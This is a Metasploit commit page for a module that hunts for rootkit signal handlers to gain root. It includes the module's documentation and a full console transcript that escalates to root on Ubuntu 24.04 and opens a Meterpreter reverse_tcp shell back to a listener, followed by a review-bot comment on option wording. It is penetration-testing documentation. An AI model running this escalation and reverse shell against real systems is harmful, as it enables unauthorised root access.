
Commit c804e5f

Land #20643, expands diamorphine privilege escalation module to other rootkits
Add Rootkit Privilege Escalation Signal Hunter
2 parents 7098e47 + 676a2ed commit c804e5f

File tree

4 files changed: +267 additions, -174 deletions


documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md

Lines changed: 0 additions & 66 deletions
This file was deleted.
Lines changed: 80 additions & 0 deletions
@@ -0,0 +1,80 @@
1+
## Vulnerable Application
2+
3+
This module searches for rootkits which use signals to elevate
4+
process privileges to UID 0 (root).
5+
6+
Some rootkits install signal handlers which listen for specific
7+
signals to elevate process privileges. This module identifies these
8+
rootkits by sending signals and observing UID switching to root.
9+
10+
This module has been tested successfully with:
11+
12+
* [Singularity](https://github.com/MatheuZSecurity/Singularity) 5b6c4b6 (2025-10-19) on Ubuntu 24.04 kernel 6.14.0-33-generic (x64)
13+
* [Diamorphine](https://github.com/m0nad/Diamorphine) 2337293 (2023-09-20) on Ubuntu 22.04 kernel 5.19.0-38-generic (x64)
14+
* [Codeine](https://github.com/diego-tella/Codeine) 9644336 (2025-09-02) on Ubuntu 22.04 kernel 5.19.0-38-generic (x64)
15+
16+
17+
## Verification Steps
18+
19+
1. Start `msfconsole`
20+
2. Get a session
21+
3. `use exploit/linux/local/rootkit_privesc_signal_hunter`
22+
4. `set SESSION [SESSION]`
23+
5. `set PAYLOAD [PAYLOAD]`
24+
6. `check`
25+
7. `run`
26+
8. You should get a new *root* session
27+
28+
29+
## Options
30+
31+
32+
### MIN_SIGNAL
33+
34+
Start at signal (default: `0`)
35+
36+
### MAX_SIGNAL
37+
38+
Stop at signal (default: `64`)
39+
40+
### PID
41+
42+
Process ID to send signals to (leave blank to spawn a new process) (default: blank)
43+
44+
45+
## Scenarios
46+
47+
### Singularity 5b6c4b6 (2025-10-19) on Ubuntu 24.04 kernel 6.14.0-33-generic (x64)
48+
49+
```
50+
msf > use exploit/linux/local/rootkit_privesc_signal_hunter
51+
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
52+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set session -1
53+
session => -1
54+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set payload linux/x64/meterpreter/reverse_tcp
55+
payload => linux/x64/meterpreter/reverse_tcp
56+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set lhost 192.168.200.130
57+
lhost => 192.168.200.130
58+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set lport 4444
59+
lport => 4444
60+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > check
61+
[+] The target is vulnerable. Rootkit(s) are installed and configured to elevate privileges for signals.
62+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > run
63+
[*] Started reverse TCP handler on 192.168.200.130:4444
64+
[*] Trying signals 0 to 64 (PID: $$) ...
65+
[+] Found 1 signals for privilege escalation (59).
66+
[*] Writing '/tmp/.9Z5PXuL7yw' (250 bytes) ...
67+
[*] Trying signal 59 ...
68+
[*] Sending stage (3090404 bytes) to 192.168.200.139
69+
[+] Deleted /tmp/.9Z5PXuL7yw
70+
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.139:41588) at 2025-10-23 11:18:25 -0400
71+
72+
meterpreter > getuid
73+
Server username: root
74+
meterpreter > sysinfo
75+
Computer : 192.168.200.139
76+
OS : Ubuntu 24.04 (Linux 6.14.0-33-generic)
77+
Architecture : x64
78+
BuildTuple : x86_64-linux-musl
79+
Meterpreter : x64/linux
80+
```
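Review bot: the `### PID` option text ("leave blank to spawn a new process") does not line up with the run transcript, which logs `Trying signals 0 to 64 (PID: $$)`: a literal `$$` is an unexpanded shell variable, not a process ID, so either expand it before logging or document that the target is the spawned shell's own PID. The option description also needs a caveat that pointing `PID` at an existing process is destructive, because most signals in the 0..64 range have a default action of terminate or core dump and any signal the rootkit does not intercept will kill that process; an operator should never set it to the session's own process or to anything they still need. While here, state that `MAX_SIGNAL` is inclusive (the default of 64 must cover SIGRTMAX, which is Diamorphine's default privilege-escalation signal, or the defaults would miss the Diamorphine target listed under Vulnerable Application), and consider adding `check`/`run` transcripts for the Diamorphine and Codeine targets, since only the Singularity scenario is shown.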

modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb

Lines changed: 0 additions & 108 deletions
This file was deleted.
